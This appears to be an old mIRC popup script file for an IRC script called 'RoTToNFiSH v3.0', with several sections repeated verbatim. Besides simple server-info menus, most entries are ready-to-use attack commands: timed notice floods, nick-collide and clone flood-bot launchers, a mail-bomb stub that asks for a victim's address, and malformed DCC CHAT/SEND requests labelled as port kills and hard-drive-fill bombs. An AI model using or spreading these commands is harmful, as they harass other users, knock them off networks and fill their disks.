n0=░òRoTToNFiSHÅ░ Version 3.0:/ame is running 12R2o12T2T12o2N12F2i12S2H version 3.0, and you can get it at http://www.geocities.com/SunsetStrip/Towers/7880/4
n3=Server Info
n4=.OLines:/stats o
n5=.KLines:/stats k
n6=.ILines:/stats i
n7=.Ports:/stats l
n10=.Trace:/trace $$?="Enter a Server to Trace:"
n11=.Number of users:/lusers
n12=.Time at server:/time
n13=.Ping server:/ping $me
n14=.CTCP Ping serv:/ctcp $me PING
n15=Self Info
n16=.ALL:/echo 3 # *** $+ $me $+ 's Current Info*** | /echo 4 # *** On Server: $server | /echo 4 # *** Current Host: $host | /echo 4 # *** Current Ip Number: $ip | /echo 4 # *** Current Nick: $me
n17=.Server:/echo 4 # *** On Server: $server
n18=.Host:/echo 4 # *** Current Host: $host
n19=.Ip Number:/echo 4 # *** Current Ip Number: $ip
n165=...Notice Flood4:/timer 0 1 /notice # σ ▀ ⌐ ╨ Ω â G H ∩ J K ú M ± ÷ ■ Q « º å √ V \/\/ ╫ Z | /timer 0 1 /notice # σ ▀ ⌐ ╨ Ω â G H ∩ J K ú M ± ÷ ■ Q « º å √ V \/\/ ╫ Z | /timer 0 1 /notice # σ ▀ ⌐ ╨ Ω â G H ∩ J K ú M ± ÷ ■ Q « º å √ V \/\/ ╫ Z | /timer 0 1 /notice # σ ▀ ⌐ ╨ Ω â G H ∩ J K ú M ± ÷ ■ Q « º å √ V \/\/ ╫ Z | /timer 0 1 /notice # σ ▀ ⌐ ╨ Ω â G H ∩ J K ú M ± ÷ ■ Q « º å √ V \/\/ ╫ Z | /timer 0 1 /notice # σ ▀ ⌐ ╨ Ω â G H ∩ J K ú M ± ÷ ■ Q « º å √ V \/\/ ╫ Z | /timer 0 1 /notice # σ ▀ ⌐ ╨ Ω â G H ∩ J K ú M ± ÷ ■ Q « º å √ V \/\/ ╫ Z
n222=..Collide:/run g:\scripts\rottonfish\mcb.exe -n $$?="Server to use?" $$?="Enter nick to collide:" | /inc -q %collide 1
n223=..Multi Collide:/run g:\scripts\rottonfish\mcb.exe -nvau 50 $$?="Server to use?" $$?="Enter nicks to Collide:" | /inc -q %collide 1
n224=.Flood Bots
n225=..Help On Flood Bots:/echo 5 Flood Bot Is A Program that uses DOS Not Multiple IRC Clients and and runs a program to flood someone off... Just Click on The Flood and Enter Your INFO Remmber this is SMART Floodz :)
n226=..PING Flood:/run G:\scripts\rottonfish\fb.exe $$?="How Many Clones To Load?" 20 $$?="Nick Or Channel To Flood" 3 $$?="Server 1" $$?="Server 2" $$?="Server 3"
n227=..ECHO Flood:/run G:\scripts\rottonfish\fb.exe $$?="How Many Clones To Load?" 20 $$?="Nick Or Channel To Flood" 6 $$?="Server 1" $$?="Server 2" $$?="Server 3"
n228=..Text Flood:/run G:\scripts\rottonfish\fb.exe $$?="How Many Clones To Load?" 20 $$?="Nick Or Channel To Flood" 1 $$?="Server 1" $$?="Server 2" $$?="Server 3"
n229=..Finger Flood:/run G:\scripts\rottonfish\fb.exe $$?="How Many Clones To Load?" 20 $$?="Nick Or Channel To Flood" 2 $$?="Server 1" $$?="Server 2" $$?="Server 3"
n230=..SED Flood:/run G:\scripts\rottonfish\fb.exe $$?="How Many Clones To Load?" 20 $$?="Nick Or Channel To Flood" 4 $$?="Server 1" $$?="Server 2" $$?="Server 3"
n231=..Blitz Flood:/run G:\scripts\rottonfish\fb.exe $$?="How Many Clones To Load?" 20 $$?="Nick Or Channel To Flood" 7 $$?="Server 1" $$?="Server 2" $$?="Server 3"
n269=░òRoTToNFiSHÅ░ Version 3.0:/ame is running 12R2o12T2T12o2N12F2i12S2H version 3.0, created by 12R2o12T2T12o2N and you can get it at http://www.geocities.com/SunsetStrip/Towers/7880/4
n0=UCentral:/uwho $$1
n1=Whois:/whois $$1
n2=Query:/query $$1
n3=Whois ECHO:/wil $$1
n4=Notify:/notify $$1
n7=.Ping:/ctcp $$1 ping
n8=.Finger:/ctcp $$1 finger
n9=.Version:/ctcp $$1 version
n10=.Time:/ctcp $$1 time
n11=.Userinfo:/ctcp $$1 userinfo
n12=.ClientInfo:/ctcp $$1 clientinfo
n15=.Send:/dcc send $$1
n16=.Chat:/dcc chat $$1
n18=Ignore Nick:/ignore $$1 3
n20=Find Email Address:/ctcp $$1 USERINFO
n22=Mail Bomb: {
n23= set %victim $?="Victim's Email Address:" | set %nbo $?="Number of emails:" | goto start
n47=.Dcc Chat Port Kill:/echo 6 %p Sent DCC Chat Port Kills to Selected User(s). Once they accept the chat they will be flooded. | raw -q privmsg $$* :DCC CHAT CHAT 3353362454 19 ?
n48=.Dcc Chat Port Bomb (multiple chats):/echo 6 %p Sending $$1 a DCC Chat Auto-Accept Bomb. If the user has Auto-Accept DCC Chat on, they are fucked... | .timer 5 1 raw -q privmsg $$1 :DCC chat chat 3353362454 19 ?
n49=.Dcc Hard Drive Fill:/raw -q privmsg $$* :DCC SEND $$?="Fake Filename:" 3353362454 19 ? | /echo %p Sent Fake DCC Send to Selected User(s). If they accept the file, the file will never stop being received until the hardrrive is full.
n50=.Dcc Hard Drive Fill Bomb (multiple files):.timer 5 1 /raw -q privmsg $$1 :DCC SEND tf $+ $r(0,9 )$+ $r(0,9) $+ $r(0,9) 3353362454 19 ? | /echo %p Sent Fake DCC Send BOMB to Selected User(s). If they accept the files, the files will never stop being received until the hardrrive is full.
n0=░òRoTToNFiSHÅ░ Version 3.0:/ame is running 12R2o12T2T12o2N12F2i12S2H version 3.0, created by 12R2o12T2T12o2N and you can get it at http://www.geocities.com/SunsetStrip/Towers/7880/4
n3=Server Info
n4=.OLines:/stats o
n5=.KLines:/stats k
n6=.ILines:/stats i
n7=.Ports:/stats l
n10=.Trace:/trace $$?="Enter a Server to Trace:"
n11=.Number of users:/lusers
n12=.Time at server:/time
n13=.Ping server:/ping $me
n14=.CTCP Ping serv:/ctcp $me PING
n15=Self Info
n16=.ALL:/echo 3 # *** $+ $me $+ 's Current Info*** | /echo 4 # *** On Server: $server | /echo 4 # *** Current Host: $host | /echo 4 # *** Current Ip Number: $ip | /echo 4 # *** Current Nick: $me
n17=.Server:/echo 4 # *** On Server: $server
n18=.Host:/echo 4 # *** Current Host: $host
n19=.Ip Number:/echo 4 # *** Current Ip Number: $ip
n165=...Notice Flood4:/timer 0 1 /notice # σ ▀ ⌐ ╨ Ω â G H ∩ J K ú M ± ÷ ■ Q « º å √ V \/\/ ╫ Z | /timer 0 1 /notice # σ ▀ ⌐ ╨ Ω â G H ∩ J K ú M ± ÷ ■ Q « º å √ V \/\/ ╫ Z | /timer 0 1 /notice # σ ▀ ⌐ ╨ Ω â G H ∩ J K ú M ± ÷ ■ Q « º å √ V \/\/ ╫ Z | /timer 0 1 /notice # σ ▀ ⌐ ╨ Ω â G H ∩ J K ú M ± ÷ ■ Q « º å √ V \/\/ ╫ Z | /timer 0 1 /notice # σ ▀ ⌐ ╨ Ω â G H ∩ J K ú M ± ÷ ■ Q « º å √ V \/\/ ╫ Z | /timer 0 1 /notice # σ ▀ ⌐ ╨ Ω â G H ∩ J K ú M ± ÷ ■ Q « º å √ V \/\/ ╫ Z | /timer 0 1 /notice # σ ▀ ⌐ ╨ Ω â G H ∩ J K ú M ± ÷ ■ Q « º å √ V \/\/ ╫ Z
n222=..Collide:/run g:\scripts\rottonfish\mcb.exe -n $$?="Server to use?" $$?="Enter nick to collide:" | /inc -q %collide 1
n223=..Multi Collide:/run g:\scripts\rottonfish\mcb.exe -nvau 50 $$?="Server to use?" $$?="Enter nicks to Collide:" | /inc -q %collide 1
n224=.Flood Bots
n225=..Help On Flood Bots:/echo 5 Flood Bot Is A Program that uses DOS Not Multiple IRC Clients and and runs a program to flood someone off... Just Click on The Flood and Enter Your INFO Remmber this is SMART Floodz :)
n226=..PING Flood:/run G:\scripts\rottonfish\fb.exe $$?="How Many Clones To Load?" 20 $$?="Nick Or Channel To Flood" 3 $$?="Server 1" $$?="Server 2" $$?="Server 3"
n227=..ECHO Flood:/run G:\scripts\rottonfish\fb.exe $$?="How Many Clones To Load?" 20 $$?="Nick Or Channel To Flood" 6 $$?="Server 1" $$?="Server 2" $$?="Server 3"
n228=..Text Flood:/run G:\scripts\rottonfish\fb.exe $$?="How Many Clones To Load?" 20 $$?="Nick Or Channel To Flood" 1 $$?="Server 1" $$?="Server 2" $$?="Server 3"
n229=..Finger Flood:/run G:\scripts\rottonfish\fb.exe $$?="How Many Clones To Load?" 20 $$?="Nick Or Channel To Flood" 2 $$?="Server 1" $$?="Server 2" $$?="Server 3"
n230=..SED Flood:/run G:\scripts\rottonfish\fb.exe $$?="How Many Clones To Load?" 20 $$?="Nick Or Channel To Flood" 4 $$?="Server 1" $$?="Server 2" $$?="Server 3"
n231=..Blitz Flood:/run G:\scripts\rottonfish\fb.exe $$?="How Many Clones To Load?" 20 $$?="Nick Or Channel To Flood" 7 $$?="Server 1" $$?="Server 2" $$?="Server 3"
n269=░òRoTToNFiSHÅ░ Version 3.0:/ame is running 12R2o12T2T12o2N12F2i12S2H version 3.0, created by 12R2o12T2T12o2N and you can get it at http://www.geocities.com/SunsetStrip/Towers/7880/4
n141=.Dcc Chat Port Kill:/echo 6 %p Sent DCC Chat Port Kills to Selected User(s). Once they accept the chat they will be flooded. | raw -q privmsg $$* :DCC CHAT CHAT 3353362454 19 ?
n142=.Dcc Chat Port Bomb (multiple chats):/echo 6 %p Sending $$1 a DCC Chat Auto-Accept Bomb. If the user has Auto-Accept DCC Chat on, they are fucked... | .timer 5 1 raw -q privmsg $$1 :DCC chat chat 3353362454 19 ?
n144=.Dcc Hard Drive Fill:/raw -q privmsg $$* :DCC SEND $$?="Fake Filename:" 3353362454 19 ? | /echo %p Sent Fake DCC Send to Selected User(s). If they accept the file, the file will never stop being received until the hardrrive is full.
n145=.Dcc Hard Drive Fill Bomb (multiple files):.timer 5 1 /raw -q privmsg $$1 :DCC SEND tf $+ $r(0,9 )$+ $r(0,9) $+ $r(0,9) 3353362454 19 ? | /echo %p Sent Fake DCC Send BOMB to Selected User(s). If they accept the files, the files will never stop being received until the hardrrive is full.